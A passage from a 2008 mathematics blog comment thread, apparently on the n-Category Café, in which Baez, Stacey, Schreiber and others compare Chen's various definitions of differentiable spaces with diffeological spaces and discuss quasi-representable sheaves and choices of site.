continuously to the whole of $K$. I hadn’t known it! But, it seems hard to understand, and probably even false, in the case when the interior of $K$ is empty - e.g. a line sitting in the plane. Then ANY function f is smooth on the interior of $K$ (the empty set), and god knows whether its derivatives extend continuously from the interior to the whole of $K$. I guess they do: any continuous function counts as a continuous extension of a function defined on the empty set! So, maybe we should add the assumption that $K$ has nonempty interior. Pondering this, I reread Chen’s paper in that 1986 Springer volume (kindly forwarded to me by my student Alex Hoffnung) and found that he added an assumption: the domains of his plots must be convex subsets of $\mathbb{R}^n$ with nonempty interior. Maybe Kriegl and Michor build this in somehow. Rereading Chen’s 1986 paper, I then noticed he cleverly starts by taking his convex sets to be “abstract”, not embedded in any particular $\mathbb{R}^n$ Then he gets them embedded in $\mathbb{R}^n$ in such a way that they have nonempty interior. He’s quite quick and sketchy about this. So: my Chen spaces will henceforth have plots whose domains are convex subsets of Euclidean spaces, with nonempty interior. Best, jb Andrew’s reply follows — I’ll use my superpowers to pretend he posted it as a comment here. Posted at April 17, 2008 12:26 AM UTC TrackBack URL for this Entry:   http://golem.ph.utexas.edu/cgi-bin/MT-3.0/dxy-tb.fcgi/1659 ### Re: Comparative Smootheology, II Hi John, Thanks for your emails. I’m delighted that you’re looking at the paper and welcome your comments; particularly as I know that you actually want to use this stuff! Okay, so on to your comments … Firstly, Chen’s definitions. Yes, he does define “differentiable spaces” in several different ways. Let me see if I can hunt them all down. I’ll repeat them all here since bytes are cheap and it’ll make it easier to comment on them. 1973 By a convex $n$-region (or, simply a convex region), we mean a closed convex region in $\mathbb{R}^n$. A convex $0$-region consists of a single point. Definition. A differentiable space $X$ is a Hausdorff space equipped with a family of maps called plots which satisfy the following conditions: (a) Every plot is a continuous map of the type $\phi : U \to X$, where $U$ is a convex region. (b) If $U^'$ is also a convex region (not necessarily of the same dimension as $U$) and if $\theta : U^' \to U$ is a $C^\infty$ map, then $\phi \theta$ is also a plot. (c) Each map $\{0\} \to X$ is a plot. So you’re right: I missed the Hausdorff condition here. That’s extremely annoying on two counts: firstly that I missed it, and secondly because it mucks up the functors. My functor to Early Chen Spaces used the indiscrete topology (essentially to make it irrelevant). I can’t do that any more. I’ll have to think about how much of a difference that makes. Of course, to a certain extent then it doesn’t make any difference since no one actually uses these spaces as anyone who is aware of Chen’s original definition is almost certainly aware of his later definitions and would prefer to use those. 1975 By a convex region we mean a closed convex set in $\mathbb{R}^n$ for some finite $n$. Definition. A predifferentiable space $X$ is a topological space equipped with a family of maps called plots which satisfy the following conditions: (a) Every plot is a continuous map of the type $\phi : U \to X$, where $U$ is a convex region. (b) If $U^'$ is also a convex region (not necessarily of the same dimension as $U$) and if $\theta : U^' \to U$ is a $C^\infty$ map, then $\phi \theta$ is also a plot. (c) Each map $\{0\} \to X$ is a plot. Remark. in [1973], a predifferentiable space is called a “differentiable space”. We propose to amend the definition of a differentiable space by adding the following condition: (d) Let $\phi : U \to X$ be a continuous map and let $\{\theta_i : U_i \to U\}$ be a family of $C^\infty$ maps, $U$, $U_i$ being convex regions, such that a function $f$ on $U$ is $C^\infty$ if and only if each $f \circ \theta_i$ is $C^\infty$ on $U_i$. If each $\phi \circ \theta_i$ is a plot of $X$, then $\phi$ itself is a plot of $X$. I had not come across this paper before and it is extremely interesting. First, in his recollection of what is now a predifferentiable space Chen drops the Hausdorff condition. Thus what I called “Early Chen Spaces” are these predifferentiable spaces. Secondly, and much much more importantly, is his introduction of condition d. This appears to be a sheaf condition but it is not; it is much stronger. By Kriegl and Michor’s result on curves in convex regions (see later for more on this), we could take the family of functions $\theta_i$ to be the family of smooth curves in $U$. Thus condition d is saying, “any continuous map which is a plot when restricted to smooth curves is a plot”. Interestingly, Chen retains the assumption of an underlying topology. 1977 The symbols $U$, $U^'$, $U_i$, $\dots$ will denote convex sets. All convex sets will be finite dimensional. They will serve as models, i.e. sets whose differentiable structure is known. Definition 1.2.1 A differentiable space $M$ is a set equipped with a family of set maps called plots, which satisfy the following conditions: (a) Every plot is a map of the type $U \to M$, where $dim U$ can be arbitrary. (b) If $\phi : U \to M$ is a plot and if $\theta : U^' \to U$ is a $C^\infty$ map, then $\phi \circ \theta$ is a plot. (c) Every constant map from a convex set to $M$ is a plot. (d) Let $\phi : U \to M$ be a set map. If $\{U_i\}$ is an open covering of $U$ and if each restriction $\phi | U_i$ is a plot, then $\phi$ is itself a plot. Again, you are right. I did not spot the fact that he has here dropped the requirement that the convex sets be closed. They are just arbitrary convex sets of finite dimension, and not necessarily embedded in Euclidean space (not that that matters). Comparing with the 1975 definition, we see that the fourth condition is now a sheaf condition. I do have the 1986 paper in front of me. Here’s the definition from that. 1986 We take as the model category the one whose ojects are convex subsets with nonempty interiour in $\mathbb{R}^n$, $n = 0,1,\dots$, and whose morphisms are $C^\infty$ maps. Definition 1.1. A $C^\infty$ space $M$ is a set equipped with a family of set maps called plots, which satisfy the following conditions: (a) Every plot is a map of the type $U \to M$ where $U$ is a convex set. (b) If $\phi: U \to M$ is a plot and if $U^'$ is also a convex set (not necessarily of the same dimension as $U$), then, for every $C^\infty$ map $\theta : U^' \to U$, $\phi \theta$ is also a plot. (c) Every constant map from a convex set to $M$ is a plot. (d) Let $\{U_i\}$ be an open convex covering of a convex set $U$, and let $\phi : U \to M$ be a set map. If each restriction $\phi | U_i$ is a plot, then $\phi$ itself is a plot. Up to trivial rephrasing, this is the same as the 1977 definition. Is there some reason you made these changes? Yes. Sheer ignorance! Stupidity cannot be ruled out either. I simply did not spot the myriad of changes. In my defence, I would say that rather than simply copying the definitions in the paper I was trying to standardise the language. We appear to have four definitions with certain characteristics: 1. 1973, no sheaf-like condition, topology, Hausdorff, closed domains. 2. 1975a, no sheaf-like condition, topology, not necessarily Hausdorff, closed domains. 3. 1975b, strong sheaf-like condition, topology, not necessarily Hausdorff, closed domains. 4. 1977 (and 1986), sheaf condition, no topology, arbitrary domains. By “arbitrary” I mean still convex, but not assumed to be closed. Phew! I got one of these, at least. My “Early Chen Spaces” are the 1975a definition. But you’re right, my “Chen Spaces” are not on the list. Whoops. However, I think that one can simply delete the word “closed” from my definition of a Chen space to get the 1977 definition and this would not require any other changes to the mathematics. I’ll have to check that, of course, but I’m reasonably confident. The other definitions will require a little thought. I’d certainly consider putting them all in my paper but I think it warrants a little reorganisation. Perhaps in the main flow of the paper it would be best to concentrate on the last definition and then have a separate section comparing all the different variants of Chen space. Does that go some way to answering your question on definitions? On to the equivalence (or not) of Chen and Souriau spaces. You ask: Are your categories “Chen” and “Souriau” equivalent or not? It seems like probably not. You don’t seem to prove this: instead, you construct some adjunctions between them and show they’re not equivalences. But, maybe you understand the situation well enough to easily figure this out! Maybe it’s easier to show there’s no equivalence that acts as the identity on the underlying sets and functions. In principle there could be some sneakier equivalence. I’m actually interested in showing that Chen’s 1977 category is not equivalent to “Souriau”, but I’ll take whatever words of advice you can offer! I think that they are not equivalent. Let’s see if we can prove this. To shorten the notation, let $\mathbf{C}$ be the category of Chen spaces (1977 definition) and $\mathbf{S}$ the category of Souriau spaces (diffeological spaces). The first thing to do is to rule out your “sneaky equivalence”. Suppose we have functors $F : \mathbf{C} \to \mathbf{S}$ and $G : \mathbf{S} \to \mathbf{C}$. Suppose that these define an equivalence of categories. Then in particular, they take terminal objects to terminal objects. We therefore have natural isomorphisms $|S| \cong \mathbf{S}(\{*\}, S) \cong \mathbf{C}(G(\{*\}), G(S)) \cong |G(S)|$ and vice versa, and this works on morphisms. Therefore up to natural isomorphism, $G$ and $F$ are set-preserving. We can make this strictly true if we want essentially by regarding $\mathbf{S}$ and $\mathbf{C}$ as lying over two copies of $Set$ and using $F$ and $G$ to identify the two copies in a (possibly) non-standard fashion. So any equivalence has to define a set-preserving one. Let us now assume that our functors are set-preserving. This means that $\mathbf{C}(C_1, C_2)$ and $\mathbf{S}(F(C_1), F(C_2))$ are the same subset of $Set(|C_1|, |C_2|)$ and similarly for $G$. This means that the compositions $G F$ and $F G$ are exactly the identity functors on their respective categories. Now, I think, we can show that the functor from Chen spaces to Souriau spaces is the one that I describe in my paper. In fact, this is easier with the assumption of closedness dropped. The set of plots of a Chen space, $C$, is precisely the union of the sets $\mathbf{C}(U,C)$ where $U$ runs over the family of convex regions with their standard Chen structure. A similar statement for Souriau spaces holds only with $U$ the family of open sets (in Euclidean spaces). Let $U$ be an open convex subset of some Euclidean space. We can give this a canonical Chen structure and a canonical Souriau structure; both of which are characterised by the fact that they contain the identity map. As $G F$ and $F G$ are the identity functors, we see that the identity map $|U| \to |U|$ is contained in all of $\mathbf{S}(U, F G(U)), \quad \mathbf{S}(F G(U), U); \quad \mathbf{C}(U, G F(U)), \mathbf{C}(G F(U), U)$ so we deduce that, with absolutely horrendous notation, $G(U) = U$ and $F(U) = U$. Now as Souriau spaces satisfy the sheaf condition, the Souriau plots are completely determined by the subfamily where $U$ runs over the family of open convex sets. We therefore have $\mathbf{S}(U,S) = \mathbf{C}(G(U), G(S)) = \mathbf{C}(U, G(S))$ More generally, we see that if $V$ is an open subset of some Euclidean space then using the sheaf conditions $\mathbf{S}(V, S) = \mathbf{C}(G(V), G(S)) = \mathbf{C}(V, G(S))$ where $V$ is given the canonical Chen structure wherein all inclusions of convex subsets are plots. Hence the functor $F : \mathbf{C} \to \mathbf{S}$ is the functor that I describe in my paper. Now we arrive at a contradiction. I’m pretty sure that even with the modified definition of Chen spaces, my example of two distinct Chen spaces with the same underlying Souriau space remains valid. Thus the functor $F$ cannot be part of an equivalence of categories and so the categories of Chen spaces and Souriau spaces are not equivalent. (Insert end-of-proof symbol here) Right, I worked that out more or less as I wrote it so there’s probably bits that I’ve overlooked. It’ll probably look a bit neater when run through iTeX (you can do that without posting it on the cafe). Let me know if you’re convinced! Now, on to Kriegl and Michor’s theorem. I simplified the statement of the theorem in their book since that deals with convex subsets in arbitrary convenient vector spaces. In doing so, perhaps I lost a little precision. What I was not careful about was defining the interior of a convex set. What I ought to have said was that this was the abstract interior, not the interior as embedded in some arbitrary $\mathbb{R}^n$. If one embeds the abstract convex set in its “natural” affine space, then this abstract interior is the interior that you inherit from the topology on the affine space. I guess that this is what Chen had in mind in the 1986 paper. So you were right to pick up on that, but it was my error in being imprecise and misquoting Kriegl and Michor. Right, that’s probably enough to be going on with for now. It’s getting near lunchtime here and I’m getting hungry. Best, Andrew Posted by: Andrew Stacey on April 17, 2008 3:53 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Concerning the sheaf-like condition from 33 years ago (the one from 1975, that is): if you take Chen by the letter here I suppose you are right that this is stronger than the ordinary sheaf condition. But is there any indication that Chen meant to anderstand and to use it that way? The notation suggests (at least from 33 year hindsight) that he did simply have the ordinary sheaf condition in mind. Since he never seems to actually mention the very word “sheaf” it might be that he wasn’t aware of the concept (could that be?) and gradually “discovered” it himself. Posted by: Urs Schreiber on April 17, 2008 4:46 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II It’s impossible to know what Chen had in mind in his various definitions, but I would hazard a guess that he knew that his third definition was stronger than the sheaf condition he eventually settled on. Boman’s paper preceded Chen’s by eight years and was known to Frölicher. The two certainly knew each other, at least by 1982. Mostow makes an interesting point in his paper. He uses Sikorski spaces; but he mentions Smith spaces and explains why he doesn’t use them. His reason is that the closure condition is difficult to check. It may be that Chen decided that his condition was difficult to check and the sheaf condition would be adequate for what he wanted to do. Posted by: Andrew Stacey on May 6, 2008 9:16 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II A small point of terminology: at least among those who regularly work with convex sets in Euclidean spaces, the notion of interior Andrew describes is usually called the “relative interior”. Posted by: Mark Meckes on April 17, 2008 2:38 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Thanks! That would disambiguate things nicely, at least after it’s explained. Posted by: John Baez on April 18, 2008 5:06 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Thanks for that, Mark. I’ll add that in to the next version to make it clear. Posted by: Andrew Stacey on April 22, 2008 9:50 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II I think that they are not equivalent. Maybe you could help me here: for $S$ a site with a forgtful functor $f$ to $Set$, we are looking at categories of quasi-representable sheaves over $S$: those sheaves $X$ on $S$ for which there exists a set $X_s$ such that for each $U \in S$ we have $X(U) \subset Set(f(U),X_s)$ and for each $\phi : U \to V$ we have $X(\phi) = \phi^* \,.$ Moreover, a morphism between quasi-representable sheaves $X \to Y$ is a morphism of sheaves which comes from a map between the underlying sets $X_s \to Y_s$. Let me write $QSh(S)$ for such a category of quasi-representable sheaves. Then I’d like to know: is $QSh(open subsets) \simeq QSh(open convex subsets)$ ? I did once think that this should be true. But maybe I was wrong. So is $QSh(open subsets) \simeq Chen spaces$ and/or $QSh(abc convex subsets) \simeq Soriau spaces\,,$ where “abc” is your favorite among “general”, “open”, “closed”. ? Generally, I’d think that $QSh(S)$ is the “right” thing to look at here. But please correct me if I am wrong about this. Posted by: Urs Schreiber on April 19, 2008 2:22 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Urs wrote: Generally, I’d think that $QSh(S)$ is the “right” thing to look at here. But please correct me if I am wrong about this. I think you’re right! Indeed, the way Alex Hoffnung and I are investigating Chen spaces and diffeological spaces is by considering them as examples of quasirepresentable sheaves. Actually we consider a slight variation on (and I believe improvement of) the definition you mention, and we speak of a category of ‘concrete sheaves’ over a ‘concrete site’ — ideas explained to us by James Dolan. But, I think you’re very much on the right track here. I don’t have the energy to explain the details, since the paper will be done in a couple of weeks, and everything will be explained very nicely there! So is $QSh(open subsets) \simeq Chen spaces$ and/or $QSh(abc convex subsets) \simeq Soriau spaces$ where “abc” is your favorite among “general”, “open”, “closed”? I think you made a typo here. Here’s the true story: $QSh(open subsets) \simeq Souriau spaces$ $QSh(convex subsets) \simeq Chen spaces$ where ‘subsets’ means ‘subsets of Euclidean spaces of arbitrary finite dimension’. The difficulty with Chen spaces is that Chen gave several definitions leading up to the final one which I’m using here. Andrew reviews the earlier definitions very nicely above But, for the purposes of doing elegant mathematics (as opposed to history) we should ignore all the earlier definitions and focus on the final one. It can be useful to take any convex subset of a Euclidean space and embed it into the lowest-dimensional Euclidean space in which it fits. We get a convex subset with nonempty interior, which makes derivatives of functions on this set a bit easier to explain. We can do this without any loss of generality, so Chen’s final definition can equivalently be phrased this way: $QSh(convex subsets with nonempty interior) \simeq Chen spaces$ This is what I do in my paper with Alex. (Hmm, maybe I need to explain this trick better in the paper.) Anyway, Andrew’s argument above has convinced me that $Chen spaces \simeq Souriau spaces$ is false, even though both turn out to be equally good for handling manifolds with boundary and manifolds with corners. And, to answer another question of yours, I also believe that $QSh[convex subsets] \simeq QSh[convex open subsets]$ is false. (I can’t figure out how to draw a “not \simeq” symbol.) Posted by: John Baez on April 20, 2008 3:38 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Thanks a lot for this reply! I am looking forward to your article with Alex Hoffnung. (I did already begin a while ago to cite it in my various notes :-) I am hoping that the issue about non-equivalences here is all in whether or not we use open subsets. Is that right? I’d be puzzled if $QSh(open subsets) \simeq QSh(open convex subsets)$ (with open sets in both cases) were false (which possibly just shows that I didn’t follow Andrew’s argument). Or it is the $Q$? We should have $Sh(open subsets) \simeq Sh(open convex subsets)$ at least. Posted by: Urs Schreiber on April 20, 2008 4:11 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Urs almost wrote: I’d be puzzled if $QSh(open subsets) \simeq QSh(open convex subsets)$ (with open sets in both cases) were false (which possibly just shows that I didn’t follow Andrew’s argument). I haven’t carefully checked, but I’ve been spending the weekend redoing a lot of proofs in Andrew’s paper, developing more intuition for this stuff… and I’m willing to bet that this is true: $QSh(open subsets) \simeq QSh(open convex subsets)$ (If you didn’t follow Andrew’s argument, perhaps it’s because his argument here just showed that if there were any equivalence between $QSh(open subsets)$ and $QSh(convex subsets)$, it would have to be a certain functor called $So$ that he’d already studied in his paper… and there, in Section 5, he had shown that functor was not an equivalence. So, the truly central issue is not to be found here, but in his paper! A summary will appear in the paper Alex and I are writing.) By the way, I believe every open convex subset of $\mathbb{R}^n$ is diffeomorphic to $\mathbb{R}^n$, so I also believe this: $QSh(open convex subsets) \simeq QSh(Euclidean spaces)$ So, all these $QSh(open subsets), QSh(open convex subsets), QSh(Euclidean spaces)$ should be various equivalent ways of defining diffeological spaces! And of course the last is the most succinct. I’m much happier with diffeological spaces now that I’ve shown they correctly handle manifolds with corners. Unfortunately, it requires a rather amazing technical result by Kriegl and Michor, Theorem 24.5 in their book. You don’t need this result if you use Chen spaces! But, if you’re willing to use Kriegl and Michor’s result (which is free), you can sail ahead quite nicely studying cobordism $n$-categories and path $n$-groupoids using diffeological spaces. I like your idea that quasirepresentable sheaves on the site of superEuclidean spaces give a notion of super smooth space. Also by the way: I think the reason Andrew is so quiet right now is that he has limited access to the web. He said he’d be back. Posted by: John Baez on April 21, 2008 5:06 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II John boggled: By the way, I believe every open convex subset of $\mathbb{R}^n$ is diffeomorphic to $\mathbb{R}^n$, so I also believe this: QSh(openconvexsubsets)≃QSh(Euclideanspaces) Can you expand on that diffeomorphism a little? Certainly they are homeomorphic but the obvious homeomorphism isn’t always a diffeomorphism. Nonetheless, you are right about the categories of quasi-representable sheaves since an open convex subset is locally diffeomorphic to a Euclidean space and that’s all you need - as I’m sure you already know! (Grandma, these things are called “eggs”.) Urs scrabbled: I think among all the various choices of test domains which we are discussing, the “right” one is simply: Euclidean spaces. I came to this conviction for two reasons: first when Todd pointed me to Moerdijk&Reyes: for precisely this choice of S (but none of the other choices which involve subsets) do we have a beautiful theory of duality between “spaces” (contravariant functors on S) and “quantities” (covariant functors on S) with the latter behaving very (very) nicely as algebras of functions (if monoidal). It sounds here as if you’re willing to drop the sheaf condition. Otherwise you get the same category of smooth things for quite a range of sites. Are you trying to drop the sheaf condition? It maybe that you want to replace it by the monoidal condition. Doesn’t this mean that everything is determined by its action on simply $\mathbb{R}$? So why not go the whole hog and use just $\mathbb{R}$? This ends you back at the category suggested by looking at the definition of Frölicher spaces, but by a rather circuitous route. On the other hand, if you retain the sheaf condition then the choice of site seems a little related to the notion of an adequate subcategory, as defined by Isbell (see the review of MR175954, or the original paper if you have access). It would be useful to determine a smallest (left) adequate subcategory, and Euclidean spaces certainly seems to be such, but it doesn’t change the properties of the actual category. The question of the site is of secondary importance to me, despite the impression I may have given elsewhere; though I like the notion of a super-site (is it a bird, is it a … sorry, already done that joke). For any of our candidate sites we have a hierarchy of categories: 1. Presheaves on $\mathcal{S}$ 2. Sheaves on $\mathcal{S}$ 3. Quasi-representable sheaves on $\mathcal{S}$ 4. Isbell-stable presheaves on $\mathcal{S}$ (have I missed any?) By the argument I gave in the Space and Quantity post, every Isbell-stable presheaf is actually a quasi-representable sheaf so this is a total ordering. If we consider two comparable sites, one can ask at what stage the two hierarchies become equivalent, or isomorphic, or set-preservingly isomorphic. For the cases we’re studying, the sites are all families of subsets of Euclidean spaces and we can rephrase this question as to whether the intersection family defines a left adequate subcategory for any of the four levels (assuming I grok what adequacy means, here). This turns the question around a little so that the focus is on the resulting category and not on the site used in its definition. A second question, and one I’m much more interested in, is to ask what level on the hierarchy we want to work in. I suspect I’ve made it fairly obvious where I stand on this issue so I’ll not bore you with more on this. A point I’ve made before, but which I think is worth making again, is that these two questions: the site and the hierarchy, are independent. Posted by: Andrew Stacey on April 22, 2008 10:29 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Are you trying to drop the sheaf condition? My attitude is the one expressed above: spaces=presheaves, rather nice spaces=sheaves, pretty nice spaces=self-dual wrt $\Omega^\bullet$, extremely nice spaces=Frölicher ones, where the last two items are thanks to discussion with you. (And you give essentially the same list now.) So, I don’t want to drop the sheaf condition in general. But I am saying that even with the sheaf condition, the choice of site matters, since it’s only with nice enough sites that very nice co-presheaves make sense. Also, when we move away from ordinary smooth test domains, things that look like entire Euclidean spaces tend to be more naturally present than any notion of subsets of them. It maybe that you want to replace it by the monoidal condition. I don’t want to replace it by that. The monoidal condition is a condition on nice co-presheaves. But it is only with test domains full Euclidean spaces that we naturally have the monoidal condition, since it makes use of the vector space structure on the Euclidean space. That fails for most subsets of Euclidean spaces. Doesn’t this mean that everything is determined by its action on simply $\mathbb{R}$? Not sure how to answer this. I guess I see what you mean, but am not sure if that’s the way to think about it. What I know is that assuming “nice” algebras of functions to be monoidal functors on the $\mathbb{R}^n$s site makes them have all the nice properties that Moerdijk&Reyes describe. (have I missed any?) As I mentioned above and before in some discussion we had elsewhere, I am thinking that an important class in between your level 2 and 3 are those things which I put at level 3: those that are self-dual under duality induced not by $C^\infty(-)$ but by $\Omega^\bullet(-)$. what level on the hierarchy we want to work in. I suspect I’ve made it fairly obvious where I stand on this issue I think there is no general best answer where in the hierarchy to work in. You will want to work as high up as possible, generally, but how high is possible depends on the application. For instance, I have an important (for me, at lest :-) application which forces me to work with things at level 3, but mix them with things at mere level 1. Posted by: Urs Schreiber on April 22, 2008 1:20 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II That makes things a little clearer, Urs. Thanks for the explanation. I’m still of the opinion that the site should be secondary to the theory. What I’d rather say is: here are the various categories of types of smooth spaces, ranked by how “nice” they are. Let us fix an object in one of them. For any suitable choice of site (i.e. family of subsets of Euclidean spaces), we get a resulting family of plots from the objects of that site. Am I making myself clear? I mean that the categories (I’m now resigned to having several!) should come first and then we can evaluate them on any given site to get things of the form that you want. If I take a Chen space and look at the Chen-morphisms from that space to Euclidean spaces then I get $C^\infty$ algebras. That doesn’t depend on the fact that I used convex sets to define Chen spaces. We still, however, have to define the categories. For this, it seems that we should strive for the smallest site possible. My argument for this is that this approach promotes clarity. If the site is large (non-technically speaking) then it is harder to separate out those properties of the resulting categories that are inherent from those which arise from the specific choice of site. At this point, you (Urs) usually start going on about $\Omega^\bullet$. This is the hom functor if we work with superspaces. I see no difficulties moving from ordinary spaces to super spaces and I quite like the idea. The argument I gave over in Space and Quantity about “ever so extremely nice spaces” being quasi-representable carries over to the super situation as it depended only on there being a separator in the category. In this case, the separator would be the superline, $\mathbb{R}^{0|1}$. However, sometimes it seems that you want to use $\Omega^\bullet$ for ordinary spaces. If so, I’d like to separate the two uses in some fashion as it sometimes makes my head spin (or superspin) trying to keep up! Also if so, this may mean that we need Euclidean spaces of arbitrary dimension but I have a sneaky suspicion that it all gets determined by its effect on lines anyway. Posted by: Andrew Stacey on April 23, 2008 8:48 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II Hi Andrew, I agree of course that if sheaves on $S$ and $S'$ are equivalent, it does not really matter much wether we think of using $S$ or $S'$. I just said that if we talk about $S$ but not $S'$ also for other reasons, it is somehow less conceptual overhead to think of $S$ instead of $S'$. it seems that we should strive for the smallest site possible. Sure. But what is “possible” depends on the application. In your application a “smaller” site is possible than in mine. In fact, the site of Euclidean space is the smallest – for my application. :-) At this point, you (Urs) usually start going on about $\Omega^\bullet$. At which point you (Andrew) usually start to stubbornly refuse following me ;-) This is the hom functor if we work with superspaces. Right, this is the argument I made a while ago. I was trying hard to fit my example into your philosophy and noticed that maybe that’s the solution. But now I think it isn’t the solution. While it is of course true that forms are superfunctions of the odd tangent bundle, the “problem” is that a) this regards forms as $\mathbb{Z}_2$ instead of a $\mathbb{Z}$-graded (at least with the usual meaning of super, which one should stick to), which is not what I need b) in the generalization of my application to superspaces, I actually need superforms on superspaces. So this proposal is not in fact resolving the tension between my application and your philosophy. sometimes it seems that you want to use $\Omega^\bullet$ for ordinary spaces. Always! In all the latest notes that I kept posting, in particular. The idea of using the interpretation of forms as superfunctions to reconcile them with your point of view I mentioned in a single blog comment. (Should have told you that I discarded it shortly afterwards.) this may mean that we need Euclidean spaces of arbitrary dimension but I have a sneaky suspicion that it all gets determined by its effect on lines anyway. But that can’t be. The classifying space of 2-forms has a single point and a single curve, but infinitely many surfaces. The classifying space of 4634-forms has a single $k$-simplex for all $k \lt 4634$, even! :-) Posted by: Urs Schreiber on April 24, 2008 2:20 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II I besiqued: this may mean that we need Euclidean spaces of arbitrary dimension but I have a sneaky suspicion that it all gets determined by its effect on lines anyway. Urs risked: But that can’t be. The classifying space of $2$-forms has a single point and a single curve, but infinitely many surfaces. The classifying space of $4634$-forms has a single $k$-simplex for all $k \lt 4634$, even! :-) But that’s precisely my point! You talk of a classifying space. A space consists of two things: the underlying set and the smooth structure. The former is completely determined by all maps from points to it and the latter is completely determined by all maps from lines to it. There’s a difference between a space and its simplicial decomposition. The difficulty lies in the fact that when we talk of $B$ being a classifying space for something then we don’t mean that there is a bijection between “things classified by $B$” and “morphisms into $B$” but rather we divide each side by an equivalence relation. One could ask: what are the things classified by actual morphisms into $B$? but that’s a side issue. So when we say “the sheaf $X$ is represented by the classifying space $B X$” then what we actually mean is that the sheaf $X$, defined on the homotopy category of smooth manifolds, lifts to a quasi-representable sheaf on the original category of smooth manifolds. This means that we can extend the definition of the original sheaf to all smooth spaces. An example may illustrate my point. We think of $K$-theory as being constructed from equivalence classes of differences of vector bundles. That is actually only true for compact spaces. For non-compact spaces, we define $K$-theory as the set of homotopy classes of maps into $(\mathbb{Z} \times) B U$. That is, knowing that there is a classifying space allows us to extend the definition of $K$-theory beyond the context in which the naïve definition is valid. There’s still a part of the story that I’m missing, I think. Why do you want to treat $\Omega^\bullet$ as if it were a smooth manifold? I can see why one might wish to extend $\Omega^\bullet$ to smooth spaces rather than smooth manifolds. Depending on how one sets up the categories of smooth spaces this may or may not be easy. But in what way do you want to treat it itself as a smooth manifold? I still see a distinction between “smooth spaces” and “things one might do to smooth spaces” but I get the feeling that for others then this distinction is at best blurred and at worst non-existent. That’s why I want to say that Frölicher spaces are smooth spaces and that all the rest are things that can be done to smooth spaces. Let me illustrate again with an example. Take Chen’s definition of forms on a Chen space. It is a very neat definition and easily extends to more the more general sheaf setting. But in the case of a quasi-representable sheaf, i.e. a Chen space, one really wants to know that one is computing something of the underlying topological space (yes, I know that a topology is not part of the data of a Chen space but nevertheless one can always topologise afterwards). Chen wanted to show that $H(\Omega^\bullet(X)) \cong H^\bullet(X)$ I don’t know too much about the technical details of his proof of this; I’ve looked at the one championed by Jones, Getzler, and Petrak using spectral sequences. But one way one could attempt to prove this would be to argue as follows: 1. The functor $H(\Omega^\bullet(-))$ is a cohomology theory on the category of smooth spaces. 2. It is representable therein. 3. Its representing spaces are equivalent to those for ordinary cohomology (more precisely, they map down to those for ordinary cohomology under the functor from smooth spaces to topological spaces). And now, in other news, I reversied: At this point, you (Urs) usually start going on about $Ω^\bullet$. to which Urs othelloed: At which point you (Andrew) usually start to stubbornly refuse following me ;-) Yes, and I feel mildly apologetic for that. It’s not that I don’t want to follow; just that I’m a bit hesitant about going off on a journey without a map. I sometimes feel as though I’m following a breadcrumb trail that’s already been eaten by the crows. I’m afraid I’m still learning some of the language that you all use and so get easily confused (imagine, trying to learn category theory and norwegian. Hmm, maybe I should combine the two. Let’s see, “adjungert” is fairly easy, “omegn” is a little more obscure – though that’s more of a topological notion that categorical – while I wonder if anyone would like to tell me the properties of the category of “mengder”?) Then I goed: This is the hom functor if we work with superspaces. To which Urs chessed: Right, this is the argument I made a while ago. I was trying hard to fit my example into your philosophy and noticed that maybe that’s the solution. But now I think it isn’t the solution. Ah, right. Okay, I’ll ignore that. Don’t get me wrong. I like the idea of saturating with respect to something other than the hom functor and I think that this is an interesting generalisation of Frölicher spaces. However, my argument given over in Space and Quantity still applies so that if one has a separator for the hom-like functor then there is still a sort of “underlying set” controlling the behaviour. Interesting technical note: I tried cut-and-pasting Urs’ comments which, as they contained a bit of mathematics, didn’t work perfectly. For example, $\Omega^\bullet$ copied over as Ω $\bullet$. Rather than write out \Omega^\bullet again, I just inserted the dollar and sup signs. This didn’t work! The \bullet character came back as an ‘Unknown character’. I guess the markdown+iTeX filter is not idempotent. Posted by: Andrew Stacey on April 25, 2008 9:45 AM | Permalink | Reply to this ### Re: Comparative Smootheology, II A space consists of two things: the underlying set and the smooth structure. Wait. We agreed that a “space” does not have to have an underlying set. Only an “extremely nice space” has! We think of K-theory No – we think of differential K-theory! :-) The space that I am denoting $S(CE(b^{n-1}u(1)))$ is the classifying space for $n$-forms, in that a map from $U$ into is is precisely an $n$-form on $U$. This is the classifying space of ordinary differential cohomology in degree $(n+1)$, in the sector where the corresponding integral class is trivial. In this smooth setting, classifying maps are not defined up to homotopy, but up to thin homotopy. Why do you want to treat $\Omega^\bullet$ as if it were a smooth manifold? I can see why one might wish to extend $\Omega^\bullet$ to smooth spaces rather than smooth manifolds. I am not sure what comment of mine this is referring to. I am not thinking of $\Omega^\bullet$ as a manifold. It is a sheaf, and hence a “pretty nice space”, but not a manifold. (Though the main work of Getzler and Henriques, for instance, was concerned with cutting down on $\Omega^\bullet$ such that it does become a manifold, or a Banach space.) a journey without a map Okay, you’d do me a favor if you expanded on in which respect the stuff I kept writing fails to serve as a map. Then I can try to improve on it. The essential part of the map was laid out in On Lie $N$-tegration and rational homotopy theory. The journey along the road on that map is then described, for instance, from section 6.3 on and then through section 7 in On nonabelian differential cohomology. As every text I’ll ever write, this is in a state of imperfection. But if you could give me more details on where you find too many bredcrumbs removed by crows, I’d might have a better chance replacing them (by stones, maybe). Posted by: Urs Schreiber on April 25, 2008 12:42 PM | Permalink | Reply to this ### Re: Comparative Smootheology, II Urs jengaed: Wait. We agreed that a “space” does not have to have an underlying set. Only an “extremely nice space” has! and then later battleshiped: I am not thinking of $Ω^\bullet$ as a manifold. It is a sheaf, and hence a “pretty nice space”, but not a manifold. Here’s where we have to be careful on terminology. By talking of “spaces”, “nice spaces”, “extremely nice spaces” and so forth then I want to treat them all as fundamentally the same type of thing. A bit like talking of “topological spaces”, “Hausdorff spaces”, and “normal spaces”. When saying that $\Omega^\bullet$ is a “pretty nice space” then that says to me that you want to see how far you can treat it as 